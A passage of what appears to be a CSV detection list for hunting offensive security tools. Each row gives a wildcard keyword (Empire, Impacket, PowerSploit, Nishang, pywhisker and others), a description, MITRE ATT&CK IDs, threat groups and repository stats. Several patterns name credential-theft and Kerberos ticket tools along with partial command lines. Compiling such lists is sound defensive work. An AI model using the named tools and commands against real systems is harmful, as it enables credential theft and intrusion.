Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,Get-SQLInstanceDomain.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Get-SQLInstanceDomain.ps1*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1082,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Get-SqlServerLinkCrawl*,offensive_tool_keyword,AD exploitation cheat sheet,Automatically find all linked databases,T1550 - T1555 - T1212 - T1558,N/A,N/A,N/A,Exploitation tools,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Get-SQLServerLoginDefaultPw*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Get-SQLServerLoginDefaultPw.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Get-SQLServerLoginDefaultPw*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1097,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Get-SQLSysadminCheck*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Get-SQLServerLoginDefaultPw.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*getST.py -k -no-pass -spn*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*GetSyscallStub.nim*,offensive_tool_keyword,Nimcrypt2,.NET PE & Raw Shellcode Packer/Loader Written in Nim,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/icyguider/Nimcrypt2,1,1,N/A,N/A,7,651,113,2023-01-20T22:07:15Z,2022-02-23T15:43:16Z -*Get-System.ps1*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Get-System.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Get-SystemDNSServer.ps1*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Get-SystemDNSServer.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Get-SystemNamedPipe*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Get-System.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*getTGT.py -dc-ip *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*getTGT.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*gettgtpkinit.py -cert-pfx *,offensive_tool_keyword,pywhisker,Python version of the C# tool for Shadow Credentials attacks,T1552.001 - T1136 - T1098,TA0003 - TA0004 - TA0005,N/A,N/A,Credential Access,https://github.com/ShutdownRepo/pywhisker,1,0,N/A,10,5,418,49,2023-10-03T14:10:17Z,2021-07-21T19:20:00Z -*gettgtpkinit.py -cert-pfx*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*gettgtpkinit.py -pfx-base64 *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*gettgtpkinit.py*,offensive_tool_keyword,PKINITtools,Tools for Kerberos PKINIT and relaying to AD CS,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/dirkjanm/PKINITtools,1,1,N/A,N/A,5,493,68,2023-04-28T00:28:37Z,2021-07-27T19:06:09Z -*Get-TimedScreenshot*,greyware_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*Get-UnattendSensitiveData*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*Get-UnquotedService*,greyware_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*Get-USBKeystrokes*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1152,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Get-UserBadPwdCount*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Invoke-SMBAutoBrute.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Get-UserPrivileges*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*Get-UserPRTToken*,offensive_tool_keyword,MailSniper,MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.,T1114 - T1134.002,TA0005 - TA0006,N/A,N/A,Credential Access,https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1,1,1,N/A,N/A,10,2625,554,2022-10-20T08:13:33Z,2016-09-08T00:36:51Z -*GetUserSPNs.*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*GetUserSPNs.vbs*,offensive_tool_keyword,kerberoast,Kerberoast is a series of tools for attacking MS Kerberos implementations,T1550 - T1555 - T1212 - T1558,TA0001 - TA0004 - TA0006,N/A,N/A,Credential Access,https://github.com/nidem/kerberoast,1,1,N/A,N/A,10,1282,313,2022-12-31T17:17:28Z,2014-09-22T14:46:49Z -*Get-VaultCredential*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Get-VaultCredential*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*Get-VaultCredential.ps1*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1055,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Get-VaultCreds*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z -*Get-VolumeShadowCopy*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*Get-WebCredentials*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*GetWebDAVStatus.csproj*,offensive_tool_keyword,cobaltstrike,Determine if the WebClient Service (WebDAV) is running on a remote system,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/G0ldenGunSec/GetWebDAVStatus,1,1,N/A,10,10,81,18,2021-09-29T17:40:52Z,2021-09-29T17:31:21Z -*GetWebDAVStatus.sln*,offensive_tool_keyword,cobaltstrike,Determine if the WebClient Service (WebDAV) is running on a remote system,T1548.002 - 